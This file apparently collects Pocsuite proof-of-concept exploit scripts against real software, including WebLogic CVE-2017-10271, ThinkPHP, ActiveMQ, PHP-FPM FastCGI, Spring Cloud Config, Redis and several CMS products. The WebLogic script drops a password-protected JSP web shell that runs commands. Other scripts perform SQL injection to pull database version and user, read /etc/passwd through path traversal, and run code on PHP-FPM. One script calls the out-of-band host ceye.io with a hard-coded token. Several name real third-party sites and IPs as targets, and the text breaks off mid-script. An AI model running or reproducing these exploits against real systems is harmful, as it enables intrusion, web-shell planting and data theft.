import requests


def verify(url):
    flag = 'PHP Extension Build'
    data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"

    payloads = [
        r"/index.php?s=captcha"
    ]
    for payload in payloads:
        vul_url = url + payload
        headers = {
            "Content-Type": "application/x-www-form-urlencoded"
        }
        r = requests.post(vul_url, data=data, headers=headers)

        if flag in r.text:
            return True
    return False



#!/usr/bin/env python
#coding: utf-8

import re
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class showSeebugSubmission(POCBase):
    vulID = 'showSeebugSubmission'
    version = 'showSeebugSubmission'
    vulDate = '2016-01-04'
    references = [' ']
    name = 'showSeebugSubmission'
    appPowerLink = 'showSeebugSubmission'
    appName = 'showSeebugSubmission'
    appVersion = 'showSeebugSubmission'
    vulType = 'showSeebugSubmission'
    desc = 'showSeebugSubmission'
    samples = [' ']


    def _attack(self):
        return self._verify()


    def _verify(self, verify=True):
        result = {}
        total = 0
        start_page = raw_input('start page:')
        stop_page = raw_input('stop page:')
        pages = int(stop_page) - int(start_page) + 1

        for page_range in range(pages):
            response = req.get(self.url + '/market/?page=%d' % (page_range + int(start_page))).content
            raw = re.findall('<tr>([\s\S]+?)</tr>', response)    #正则表达式非贪婪匹配
            for amount_of_raws in range(len(raw)):
                if '<span class="label label-brand">提交</span>' in raw[amount_of_raws]:
                    author = re.search('<img [\s\S]+?>([\s\S]+?)</a>' , raw[amount_of_raws]).group(1)
                    time = re.search('<td class="text-center datetime">[\s\S]+?(\d[\d :-]+)[\s\S]+?</td>' , raw[amount_of_raws]).group(1)
                    type = re.search('<td class="text-center">(.+)</td>' , raw[amount_of_raws]).group(1)
                    vid = re.search('<a class="vul-title" href="/vuldb/(ssvid-\d+)">([\s\S]+?)</a>' , raw[amount_of_raws]).group(1)
                    title = re.search('<a class="vul-title" href="/vuldb/ssvid-\d+">([\s\S]+?)</a>' , raw[amount_of_raws]).group(1)
                    award = re.search('</i>[\s\S]+?([\d\.]+kB)[\s\S]+?</td>' , raw[amount_of_raws]).group(1)

                    total = total + 1
                    print '\n'
                    print str(total) + '.'
                    print author
                    print time
                    print type
                    print vid
                    print title
                    print award
                    print '\n'

                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
        print 'total:' , total
        return self.parse_attack(result)


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output

register(showSeebugSubmission)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author  : jeffzhang
# @Time    : 18-7-9
# @File    : _180709_WebLogic_WLS_RCE.py
# @Desc    : ""


import random
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '00007'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2017-10-17'
    createDate = '2018-07-09'
    updateDate = '2018-07-09'
    references = ['https://nvd.nist.gov/vuln/detail/CVE-2017-10271']
    name = 'Weblogic WLS RCE'
    appPowerLink = 'https://www.oracle.com/middleware/weblogic/index.html'
    appName = 'Weblogic'
    appVersion = '10.3.6.*,12.1.3.*,12.2.1.1-2'
    vulType = 'RCE'
    desc = '''
    Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security)
    '''
    samples = ['']

    def _verify(self):
        result = {}
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
            "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3",
            "Content-Type": "text/xml"
        }
        payload = '''
                <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext
                xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/0bxxl42slk.jsp</string>
                <void method="println"><string><![CDATA[<%   if("hobs7p".equals(request.getParameter("pwd"))){
                    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
                    int a = -1;
                    byte[] b = new byte[2048];
                    out.print("flag:m36ty4jg");
                    while((a=in.read(b))!=-1){
                        out.println(new String(b));
                    }
                } %>]]></string></void><void method="close"/>
                </void></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
            '''
        try:
            if '://' not in self.url:
                self.url = 'http://' + self.url
            url_1 = self.url + '/wls-wsat/CoordinatorPortType11'
            req.post(url_1, data=payload, headers=headers, timeout=5)
            url_2 = self.url + '/bea_wls_internal/0bxxl42slk.jsp?pwd=hobs7p&i=whoami'
            resp = req.get(url_2, timeout=5)
            if resp.status_code == 200 and 'flag:m36ty4jg' in resp.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Webshell'] = self.url + '/bea_wls_internal/0bxxl42slk.jsp?pwd=hobs7p&i=whoami'
                result['VerifyInfo']['Response'] = resp.content[13:38]
        except Exception as e:
            print(e)
        return self.parse_attack(result)

    def _attack(self):
        return self._verify

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet noting return')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '1'  # vul ID
    version = '4.1.12.3'
    author = 'jinyu00'
    vulDate = '2016-07-10'
    createDate = '2016-07-10'
    updateDate = '2016-07-10'
    references = ['https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6174']
    name = 'IPS Community Suite <= 4.1.12.3 Autoloaded PHP远程带执行漏洞'
    appPowerLink = 'https://invisionpower.com/release-notes/4113-r44/'
    appName = 'IPS Community Suite'
    appVersion = 'IPS Community Suite <= 4.1.12.3'
    vulType = 'Code Execution'
    desc = '''
    IPS Community Suite <= 4.1.12.3 Autoloaded PHP远程带执行漏洞
    '''

    def _attack(self):
        return self._verify()

    def _verify(self):
        payload = '/index.php?app=core&module=system&controller=content&do=find&content_class=cmsFields1{}phpinfo();/*'
        res = req.get(self.url + payload)
        return self.parse_verify(res)

    def parse_verify(self, res):
        output = Output(self)
        result = {}
        if res.status_code == 200 and "PHP Version" in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = res.url
            output.success(result)
        else:
            output.fail('No vulnerability found.')

        return output


register(TestPOC)



#!/usr/bin/env python
#_*_ encoding: utf-8 _*_

from pocsuite3.api import POCBase
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from pocsuite3.api import OptString
from pocsuite3.api import requests, logger
from collections import OrderedDict
import random
import socket

class ActiveMQ(POCBase):
    vulID = '96268'
    version = '1.0'
    author = ['big04dream']
    vulDate = '2015-10-29'
    createDate = '2019-10-17'
    updateDate = '2019-10-17'
    references = ['https://www.seebug.org/vuldb/ssvid-89692']
    name = 'Apache ActiveMQ Fileserver File Upload'
    appPowerLink = 'http://activemq.apache.org/'
    appName = 'ActiveMQ'
    appVersion = '5.x ~ 5.14.0'
    vulType = 'File Upload'
    desc = '''
    Apache ActiveMQ Fileserver File Upload
    '''

    def _options(self):
        o = OrderedDict()
        o["port"] = OptString('', description='这个poc需要输入端口号', require=True)
        return o

    def random_str(self,l):
        str1 = ""
        for i in range(l):
            str1 += (random.choice("ABCDEFGH1234567890"))
        return str1
    
    def _verify(self):
        result = {}
        try:
            socket.setdefaulttimeout(5)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            ip = self.url.split('//')[1]
            port = int(self.get_option("port"))
            s.connect((ip, port))
            filename = self.random_str(6)
            flag = "PUT /fileserver/sex../../..\\styles/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nbig04dream\r\n\r\n" % (
                filename)
            s.send(flag.encode())
            s.recv(1024)
            s.close()
            url = 'http://' + ip + ":" + str(port) + '/styles/%s.txt' % (filename)
            res_html = requests.get(url).text
            if 'big04dream' in res_html:
                result["VerifyInfo"] = {}
                result['VerifyInfo']['IP'] = ip
                result['VerifyInfo']['Payload'] = flag
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)
    
    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not activemq vulnerability')
        return output

register_poc(ActiveMQ)


#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'TPshopv3.0 sql injection Vulnerability'
    vulID = '0'
    author = ['cws6']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://www.uedbox.com/post/55041/']
    desc = '''tpshopv3.0 /application/home/controller/api.php的shop()存在sql注入'''

    vulDate = '2018-05-13'
    createDate = '2019-05-15'
    updateDate = '2019-05-15'

    appName = 'TPshop'
    appVersion = 'v3.0'
    appPowerLink = 'http://www.tp-shop.cn'
    samples = ['re']

    
    def _attack(self):
        """attack mode"""
        result = {}
        payload1 = '/index.php/home/api/shop/?province_id=1&city_id=2&district_id=1&shop_address=aaaa&latitude=1&longitude=1- latitude)* 111),2))),2) AS distance FROM `tp12` WHERE `deleted` = :where_deleted AND `shop_status` = :where_shop_status AND `province_id` = :where_province_id AND `city_id` = :where_city_id AND `district_id` = :where_district_id AND ( `shop_name` LIKE :where_shop_name OR `shop_address` LIKE :where_shop_address ) UNION(SELECT(database()),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29))%23' 
        resp = req.get(self.url + payload1)
        dbname1 = re.findall("'(.*?).tp12'", resp.content)
        print(dbname1)
        if dbname1:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['Database'] = {}
            result['Database']['DBname'] = dbname1[1]
        return self.parse_output(result)

    def _verify(self):
        """verify mode"""
        result = {}
        payload1 = "/index.php/home/api/shop?province_id=1&city_id=2&district_id=1&shop_address=aaaa&latitude=1&longitude=1'" 
        resp = req.get(self.url + payload1 )
        if 'SQLSTATE[42000]' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '67389'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2010-01-03'
    createDate = '2016-01-15'
    updateDate = '2016-01-15'
    references = ['http://www.sebug.net/vuldb/ssvid-67389']
    name = 'Joomla Component com_doqment (cid) SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component com_doqment'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
        Joomla Component com_doqment的参数cid过滤不严格，导致出现SQL注入漏洞。
        远程攻击者可以利用该漏洞执行任意SQL指令，获取敏感信息。
    '''
    samples = ['http://www.ecosys-tec.com','http://novocement.ru',]

    def _attack(self):
        #利用注入漏洞读取数据库信息
        result = {}
        #利用的payload
        payload="-11/**/union/**/select/**/1,2,concat(0x247e7e7e24,version(),0x2a2a2a,user(),0x247e7e7e24),4,5,6,7,8--"
        #漏洞地址
        exploit='/index.php?option=com_doqment&cid='
        #构造访问地址
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #正则表达式
        par="\$~~~\$([0-9a-zA-Z_].*)\*\*\*([0-9a-zA-Z_].*)\$~~~\$"
        #访问
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否有特殊字符串
        if '$~~~$' in resp.content:
            match=re.search(par,resp.content,re.I|re.M)
            if match:
                #漏洞利用成功
                result['DatabaseInfo']={}
                #数据库版本
                result['DatabaseInfo']['Version']=match.group(1)
                #数据库用户
                result['DatabaseInfo']['Username']=match.group(2)
        return self.parse_output(result)

    def _verify(self):
        #利用注入漏洞计算md5(1)
        result = {}
        #利用的payload
        payload='-11/**/union/**/select/**/1,2,md5(1),4,5,6,7,8--'
        #漏洞地址
        exploit='/index.php?option=com_doqment&cid='
        #构造访问地址
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #访问
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否有特殊字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
        if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
            #漏洞验证成功
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] = self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from pocsuite.api.request import req
import urllib

class TestPOC(POCBase):
    vulID = '97912'  # ssvid
    version = '2.1.0-2.1.1or2.0.0-2.0.3or1.4.0-1.4.5'
    author = ['co0ontty']
    vulDate = '2019-7-19'
    createDate = '2019-7-19'
    updateDate = '2019-4-17'
    references = ['https://www.seebug.org/vuldb/ssvid-97912']
    name = 'Spring Cloud Config Server 路径穿越与任意文件读取漏洞'
    appPowerLink = 'https://github.com/spring-cloud/spring-cloud-config'
    appName = 'Spring Cloud Config'
    appVersion = '2.1.0-2.1.1or2.0.0-2.0.3or1.4.0-1.4.5'
    vulType = 'Directory traversal'
    desc = '''
        该漏洞本质是允许应用程序通过spring-cloud-config-server模块获取任意配置文件,攻击者可以构造恶意URL实现目录遍历漏洞的利用。
    '''
    samples = ['']
    install_requires = ['']



    def _verify(self):
        '''verify mode'''
        vul_url = self.url
        proto,rest = urllib.splittype(vul_url)
        host,rest = urllib.splithost(rest)
        host,port = urllib.splitport(host)
        result = {}
        if port is None:
            vul_url = self.url+":8888"
        target = vul_url+"/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd"
        response_code = req.get(target).status_code
        r = req.get(target)
        if response_code == 200 and "bin" in r.text and "/usr/sbin" in r.text and "root" in r.text:
            result['VerifyInfo'] = "success"
        pass
        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

   

register(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
from pocsuite3.api import POCBase, Output, register_poc as register
import socket
import random
import re
import sys
from io import BytesIO

PY2 = True if sys.version_info.major == 2 else False


def bchr(i):
    if PY2:
        return force_bytes(chr(i))
    else:
        return bytes([i])


def bord(c):
    if isinstance(c, int):
        return c
    else:
        return ord(c)


def force_bytes(s):
    if isinstance(s, bytes):
        return s
    else:
        return s.encode('utf-8', 'strict')


def force_text(s):
    if issubclass(type(s), str):
        return s
    if isinstance(s, bytes):
        s = str(s, 'utf-8', 'strict')
    else:
        s = str(s)
    return s


class FastCGIClient:
    """A Fast-CGI Client for Python"""

    # private
    __FCGI_VERSION = 1

    __FCGI_ROLE_RESPONDER = 1
    __FCGI_ROLE_AUTHORIZER = 2
    __FCGI_ROLE_FILTER = 3

    __FCGI_TYPE_BEGIN = 1
    __FCGI_TYPE_ABORT = 2
    __FCGI_TYPE_END = 3
    __FCGI_TYPE_PARAMS = 4
    __FCGI_TYPE_STDIN = 5
    __FCGI_TYPE_STDOUT = 6
    __FCGI_TYPE_STDERR = 7
    __FCGI_TYPE_DATA = 8
    __FCGI_TYPE_GETVALUES = 9
    __FCGI_TYPE_GETVALUES_RESULT = 10
    __FCGI_TYPE_UNKOWNTYPE = 11

    __FCGI_HEADER_SIZE = 8

    # request state
    FCGI_STATE_SEND = 1
    FCGI_STATE_ERROR = 2
    FCGI_STATE_SUCCESS = 3

    def __init__(self, host, port, timeout, keepalive):
        self.host = host
        self.port = port
        self.timeout = timeout
        if keepalive:
            self.keepalive = 1
        else:
            self.keepalive = 0
        self.sock = None
        self.requests = dict()

    def __connect(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(self.timeout)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            self.sock.connect((self.host, int(self.port)))
        except socket.error as msg:
            self.sock.close()
            self.sock = None
            # print(repr(msg))
            return False
        return True

    def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
        length = len(content)
        buf = bchr(FastCGIClient.__FCGI_VERSION) \
              + bchr(fcgi_type) \
              + bchr((requestid >> 8) & 0xFF) \
              + bchr(requestid & 0xFF) \
              + bchr((length >> 8) & 0xFF) \
              + bchr(length & 0xFF) \
              + bchr(0) \
              + bchr(0) \
              + content
        return buf

    def __encodeNameValueParams(self, name, value):
        nLen = len(name)
        vLen = len(value)
        record = b''
        if nLen < 128:
            record += bchr(nLen)
        else:
            record += bchr((nLen >> 24) | 0x80) \
                      + bchr((nLen >> 16) & 0xFF) \
                      + bchr((nLen >> 8) & 0xFF) \
                      + bchr(nLen & 0xFF)
        if vLen < 128:
            record += bchr(vLen)
        else:
            record += bchr((vLen >> 24) | 0x80) \
                      + bchr((vLen >> 16) & 0xFF) \
                      + bchr((vLen >> 8) & 0xFF) \
                      + bchr(vLen & 0xFF)
        return record + name + value

    def __decodeFastCGIHeader(self, stream):
        header = dict()
        header['version'] = bord(stream[0])
        header['type'] = bord(stream[1])
        header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
        header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
        header['paddingLength'] = bord(stream[6])
        header['reserved'] = bord(stream[7])
        return header

    def __decodeFastCGIRecord(self, buffer):
        header = buffer.read(int(self.__FCGI_HEADER_SIZE))

        if not header:
            return False
        else:
            record = self.__decodeFastCGIHeader(header)
            record['content'] = b''

            if 'contentLength' in record.keys():
                contentLength = int(record['contentLength'])
                record['content'] += buffer.read(contentLength)
            if 'paddingLength' in record.keys():
                skiped = buffer.read(int(record['paddingLength']))
            return record

    def request(self, nameValuePairs={}, post=''):
        if not self.__connect():
            print('connect failure! please check your fasctcgi-server !!')
            return

        requestId = random.randint(1, (1 << 16) - 1)
        self.requests[requestId] = dict()
        request = b""
        beginFCGIRecordContent = bchr(0) \
                                 + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
                                 + bchr(self.keepalive) \
                                 + bchr(0) * 5
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
                                              beginFCGIRecordContent, requestId)
        paramsRecord = b''
        if nameValuePairs:
            for (name, value) in nameValuePairs.items():
                name = force_bytes(name)
                value = force_bytes(value)
                paramsRecord += self.__encodeNameValueParams(name, value)

        if paramsRecord:
            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)

        if post:
            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)

        self.sock.send(request)
        self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND
        self.requests[requestId]['response'] = b''
        return self.__waitForResponse(requestId)

    def __waitForResponse(self, requestId):
        data = b''
        while True:
            buf = self.sock.recv(512)
            if not len(buf):
                break
            data += buf

        data = BytesIO(data)
        while True:
            response = self.__decodeFastCGIRecord(data)
            if not response:
                break
            if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \
                    or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
                if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
                    self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR
                if requestId == int(response['requestId']):
                    self.requests[requestId]['response'] += response['content']
            if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:
                self.requests[requestId]
        return self.requests[requestId]['response']

    def __repr__(self):
        return "fastcgi connect host:{} port:{}".format(self.host, self.port)


def run(ip):
    client = FastCGIClient(ip, 9000, 3, 0)
    params = dict()
    documentRoot = "/"
    uri = "/usr/local/lib/php/PEAR.php"
    content = "'<?php echo `whoami`; ?>'"
    params = {
        'GATEWAY_INTERFACE': 'FastCGI/1.0',
        'REQUEST_METHOD': 'POST',
        'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
        'SCRIPT_NAME': uri,
        'QUERY_STRING': '',
        'REQUEST_URI': uri,
        'DOCUMENT_ROOT': documentRoot,
        'SERVER_SOFTWARE': 'php/fcgiclient',
        'REMOTE_ADDR': '127.0.0.1',
        'REMOTE_PORT': '9985',
        'SERVER_ADDR': '127.0.0.1',
        'SERVER_PORT': '80',
        'SERVER_NAME': "localhost",
        'SERVER_PROTOCOL': 'HTTP/1.1',
        'CONTENT_TYPE': 'application/text',
        'CONTENT_LENGTH': "%d" % len(content),
        'PHP_VALUE': 'auto_prepend_file = php://input',
        'PHP_ADMIN_VALUE': 'allow_url_include = On'
    }
    response = client.request(params, content)
    return force_text(response)


def poc(url):
    print
    "url=" + url
    ip = re.findall(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b", url)
    res = run(ip[0])
    return res


class TestPOC(POCBase):
    name = 'php_fpm_fastCGI_RCE'
    vulID = '无'
    author = ['sxd']
    vulType = 'RCE'
    version = '1.0'  # default version: 1.0
    references = ['https://www.seebug.org/vuldb/ssvid-89720']
    desc = '''
		   PHP-FPM是一个fastcgi协议解析器，Nginx等服务器中间件将用户请求按照fastcgi的规则打包好传给FPM。
		   FPM按照fastcgi的协议将TCP流解析成真正的数据。PHP-FPM默认监听9000端口，如果这个端口暴露在公网，
		   则我们可以自己构造fastcgi协议，和fpm进行通信。
		   '''
    vulDate = '2020-03-26'
    createDate = '2020-03-26'
    updateDate = '2020-03-26'
    appName = 'fpm'
    appVersion = 'fpm all'
    appPowerLink = ''
    samples = ['socket', 'io']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if response != "None":
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + ' php_fpm_fastCGI_RCE' + ' is exist!'
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = re.compile("\n'(.*?)\n").findall(response)[0]
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-


from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'NS-ASG 6.2 SQLI'
    vulID = '0'  # https://www.seebug.org/vuldb/ssvid-78176
    author = ['bey0nd']
    vulType = 'SQLI'
    version = '1.0'    # default version: 1.0
    references = ['']
    desc = '''NS-ASG 6.2 SQLI'''

    vulDate = '2013-02-14'
    createDate = '2013-02-14'
    updateDate = '2013-02-14'

    appName = 'NETENTSEC'
    appVersion = 'NETENTSEC'
    appPowerLink = 'NETENTSEC'
    samples = ['https://121.28.81.124/']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        payloads= ['/admin/config_MT.php?action=delete&Mid=1%20and%20extractvalue(0x1,concat(0x23,md5(1)))',
        '/admin/count_user.php?action=GO&search=%27%0band%0bextractvalue(0x1,concat(0x23,md5(1)))%23',
        '/admin/edit_fire_wall.php?action=update&FireWallId=111%20and%20extractvalue(0x1,concat(0x23,md5(1)))',
        ]
        for pay in payloads:
            url = self.url + pay
            resp = req.get(url)
            if resp and resp.text and resp.status_code == 200:
                if "c4ca4238a0b923820dcc509a6f7584" in resp.text:
                    result['DBInfo'] = {}
                    result['DBInfo']['Password'] = "c4ca4238a0b923820dcc509a6f75849b"
                    break
            
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Failed')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import socket
import urlparse
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '00002'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2017-08-15'
    createDate = '2017-08-15'
    updateDate = '2017-08-15'
    references = [
        'http://blog.knownsec.com/2015/11/\
        analysis-of-redis-unauthorized-of-expolit/']
    name = 'Redis 未授权访问'
    appPowerLink = 'https://www.redis.io'
    appName = 'Redis'
    appVersion = 'All'
    vulType = 'Unauthorized'
    desc = '''
            redis 默认没有开启相关认证，黑客直接访问即可获取数据库中所有信息。
    '''
    samples = ['128.36.23.111']

    def _verify(self):
        result = {}
        payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        s = socket.socket()
        socket.setdefaulttimeout(4)
        try:
            host = self.url.split(':')[1].strip('/')
            if len(self.url.split(':')) > 2:
                port = int(self.url.split(':')[2].strip('/'))
            else:
                port = 6379
            s.connect((host, port))
            s.send(payload)
            data = s.recv(1024)
            if data and 'redis_version' in data:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = self.url
                result['VerifyInfo']['port'] = port
                result['VerifyInfo']['result'] = data[:20]
        except Exception as e:
            print(str(e))
        s.close()
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("someting error")
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = 'SSV-67893'  # vul ID
    version = '1'
    author = 'hzr'
    vulDate = '2010-03-13'
    createDate = '2015-10-23'
    updateDate = '2015-10-23'
    references = ['https://www.exploit-db.com/exploits/11711/']
    name = 'Azeno CMS - SQL Injection Vulnerability'
    appPowerLink = 'N/A'
    appName = 'Azeno'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
        Azeno CMS的/admin/index.php 文件"id" 变量没有进行过滤，造成SQL注入
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        output = Output(self)
        result = {}
        #根据Pocsuite格式要求，定义一个特殊输出字符串，验证sql注入是否成功
        payload = "/admin/index.php?id=-1 UNION SELECT 1,CONCAT(0x7165696a71,CAST(md5(23333) AS CHAR),0x20),3,4,5,6,7 FROM dc_user"       
        verify_url = self.url + payload
        content = req.get(verify_url).content
        if "qeijq0ba7bc92fcd57e337ebb9e74308c811f" in content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
            output.success(result)
        else:
            output.fail('SQL Injection Failed')
        return output

    def _attack(self): 
        return self._verify()

register(TestPOC)


#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import json
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

def post_url(url, payload):
    try:
        httpreq = req.Session()
        headers = {
        "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        }
        resp = httpreq.post(url, data=payload)
    except Exception as ex:
        resp = None
    return resp

def get_id():
    url = 'http://api.ceye.io/v1/records?token=d2af2f5d4910894d2f244c83cd9e6cc6&type=http&filter=sworderNB22222-----'
    try:
        httpreq = req.Session()
        headers = {
        "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        }
        resp = httpreq.get(url=url)
        resp_json = json.loads(resp.content)
        first_id = resp_json['data'][0]['id']
    except Exception as ex:
        first_id = 0
    return first_id


class TestPOC(POCBase):
    name = 'ECTOUCH Core 2.7.2 Blind XXE'
    vulID = '0'
    author = ['cws6']
    vulType = 'blind-xxe'
    version = '1'
    references = ['https://www.anquanke.com/post/id/169960']
    desc = '''ECTOUCH Core 2.7.2 Blind XXE'''

    vulDate = '2019-01-23'
    createDate = '2019-04-08'
    updateDate = '2019-04-08'

    appName = 'ectouch'
    appVersion = '2.7.2'
    appPowerLink = 'http://www.ectouch.cn'
    samples = ['re']

    def _attack(self):
        """attack mode"""
        return self._verify()

    def _verify(self):
        """verify mode"""
        result = {}
        init_id = get_id()
        payload1 = '/index.php?m=default&c=Respond&a=index&code=wxpay&type=notify&style=xxx'
